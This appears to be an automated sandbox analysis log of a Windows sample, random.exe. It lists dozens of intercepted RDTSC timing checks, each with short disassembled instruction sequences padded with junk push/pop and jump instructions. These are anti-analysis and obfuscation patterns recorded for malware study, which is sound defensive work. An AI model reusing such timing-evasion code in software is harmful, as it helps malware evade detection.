Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8E2C7D second address: 8E2C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EEA70 second address: 8EEA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8EEA74 second address: 8EEA7E instructions: 0x00000000 rdtsc 0x00000002 je 00007F3C153246D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 825BB1 second address: 825BC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3C150B7566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F3C150B756Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F3781 second address: 8F37C4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jns 00007F3C153246D6h 0x00000009 je 00007F3C153246D6h 0x0000000f pop ecx 0x00000010 jmp 00007F3C153246E8h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jbe 00007F3C153246DAh 0x0000001e jg 00007F3C153246DAh 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F5A6C second address: 8F5A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F5A72 second address: 8F5A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F5A76 second address: 8F5A9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F5BE2 second address: 8F5BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F3C153246D6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F8AB5 second address: 8F8AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8F8AB9 second address: 8F8ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9024B9 second address: 9024CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3C150B756Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9024CC second address: 9024DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F3C153246DAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9024DB second address: 9024F4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F3C150B7572h 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 903B45 second address: 903B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 90CBCE second address: 90CBE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7573h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 90CBE7 second address: 90CBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9127C4 second address: 9127E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B756Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F3C150B7566h 0x00000015 popad 0x00000016 jbe 00007F3C150B756Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9110C6 second address: 9110CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9110CA second address: 911106 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7573h 0x00000007 jmp 00007F3C150B7578h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F3C150B756Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 911106 second address: 911111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F3C153246D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 911111 second address: 911117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 911117 second address: 911125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3C153246D6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91167F second address: 911683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 911683 second address: 91168F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3C153246D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91195C second address: 911960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 911960 second address: 911964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 911964 second address: 91197A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3C150B756Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 911AD7 second address: 911ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 911ADD second address: 911AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jns 00007F3C150B7566h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 911AEB second address: 911B12 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3C153246F1h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F3C153246E9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 91846C second address: 9184A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F3C150B7575h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F3C150B7574h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8317AD second address: 8317B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8317B5 second address: 8317BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8317BC second address: 8317C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8317C2 second address: 8317E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3C150B7574h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnp 00007F3C150B7566h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8317E6 second address: 831803 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3C153246D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007F3C153246D6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 929F80 second address: 929F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 92CA65 second address: 92CA74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 92F030 second address: 92F03A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3C150B7566h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9262CF second address: 9262D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93E46B second address: 93E474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93E474 second address: 93E478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93E478 second address: 93E47C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93E5D4 second address: 93E5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edi 0x00000008 pushad 0x00000009 jmp 00007F3C153246E7h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93E5FA second address: 93E606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 93E606 second address: 93E60A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 956D4E second address: 956D5F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 956D5F second address: 956D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 957169 second address: 95716E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95716E second address: 95717B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F3C153246D6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95717B second address: 95718E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F3C150B7572h 0x0000000b jnl 00007F3C150B7566h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95718E second address: 9571A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3C153246E2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 9571A8 second address: 9571BA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3C150B756Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95BC35 second address: 95BC39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95BC39 second address: 95BC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95BC3F second address: 95BC44 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95BC44 second address: 95BC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 95D3DD second address: 95D41C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3C153246E0h 0x0000000e pop edi 0x0000000f js 00007F3C153246EEh 0x00000015 jmp 00007F3C153246DAh 0x0000001a pushad 0x0000001b push edi 0x0000001c pop edi 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D004AF second address: 4D004C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B756Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D004C7 second address: 4D004CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D004CD second address: 4D0054A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B756Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3C150B7574h 0x00000011 and si, 6018h 0x00000016 jmp 00007F3C150B756Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F3C150B7578h 0x00000022 and al, 00000078h 0x00000025 jmp 00007F3C150B756Bh 0x0000002a popfd 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F3C150B7575h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D0054A second address: 4D00568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF0299 second address: 4CF029D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF029D second address: 4CF02A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF02A3 second address: 4CF02A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF02A9 second address: 4CF02FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F3C153246E6h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F3C153246DDh 0x0000001c jmp 00007F3C153246DBh 0x00000021 popfd 0x00000022 movzx eax, bx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF02FC second address: 4CF0311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C150B7571h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF0311 second address: 4CF0315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20F78 second address: 4D20F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C150B756Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20F88 second address: 4D20F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20F8C second address: 4D20FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F3C150B756Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov di, D9B0h 0x00000018 mov ebx, 7111E0DCh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20FB1 second address: 4D20FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C153246E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20FC6 second address: 4D20FCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D20FCA second address: 4D20FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e push edx 0x0000000f mov ah, CEh 0x00000011 pop edi 0x00000012 popad 0x00000013 pop ebp 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov al, 6Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0126 second address: 4CC012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC012B second address: 4CC0180 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3C153246E1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F3C153246DEh 0x00000015 mov ebp, esp 0x00000017 jmp 00007F3C153246E0h 0x0000001c push dword ptr [ebp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0180 second address: 4CC0184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0184 second address: 4CC01A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC01A1 second address: 4CC01A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC01A6 second address: 4CC01B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov dh, DBh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC01B8 second address: 4CC01CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 mov ax, di 0x00000009 pop edx 0x0000000a popad 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ecx, ebx 0x00000013 push ebx 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF002C second address: 4CF0097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3C153246E1h 0x00000011 and si, 6006h 0x00000016 jmp 00007F3C153246E1h 0x0000001b popfd 0x0000001c mov esi, 61CA0FB7h 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F3C153246DAh 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F3C153246E7h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF0097 second address: 4CF009D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF009D second address: 4CF00B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3C153246DAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF00B2 second address: 4CF00B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF00B8 second address: 4CF00BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CE0AEE second address: 4CE0B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C150B756Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CE0B00 second address: 4CE0B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CE07FD second address: 4CE0801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CE0801 second address: 4CE0805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CE0805 second address: 4CE080B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CE080B second address: 4CE0836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F3C153246E3h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CE0836 second address: 4CE083B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF0581 second address: 4CF05A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3C153246DDh 0x00000011 rdtsc
